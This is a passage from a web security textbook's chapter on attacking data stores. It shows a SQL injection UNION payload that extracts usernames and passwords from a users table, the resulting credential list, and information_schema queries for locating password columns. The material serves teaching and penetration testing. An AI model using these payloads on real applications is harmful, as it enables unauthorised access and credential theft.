the-web-application-hackers-handbook

310 Chapter 9 n Attacking Data Stores
NAME
Matthew Adamson
shop_items
shop_items
shop_items
addr_book
addr_book
users
users
E-MAIL
handytrick@gmail.com
price
prodid
prodname
contactemail
contactname
username
password
Here, the users table is an obvious place to begin extracting data. We could
extract data from the users table using this query:
Name=Matthew’%20UNION%20select%20username,password,null,null,null%20
from%20users--
NAME
Matthew Adamson
administrator
dev
marcus
smith
jlo
E-MAIL
handytrick@gmail.com
fme69
uber
8pinto
twosixty
6kdown
TIP The information_schema is supported by MS-SQL, MySQL, and many
other databases, including SQLite and Postgresql. It is designed to hold database
metadata, making it a primary target for attackers wanting to examine
the database. Note that Oracle doesn’t support this schema. When targeting
an Oracle database, the attack would be identical in every other way. However,
you would use the query SELECT table_name,column_name FROM all_tab_
columns to retrieve information about tables and columns in the database.
(You would use the user_tab_columns table to focus on the current database
only.) When analyzing large databases for points of attack, it is usually best to
look directly for interesting column names rather than tables. For instance:
SELECT table_name,column_name FROM information_schema.columns where
column_name LIKE ‘%PASS%’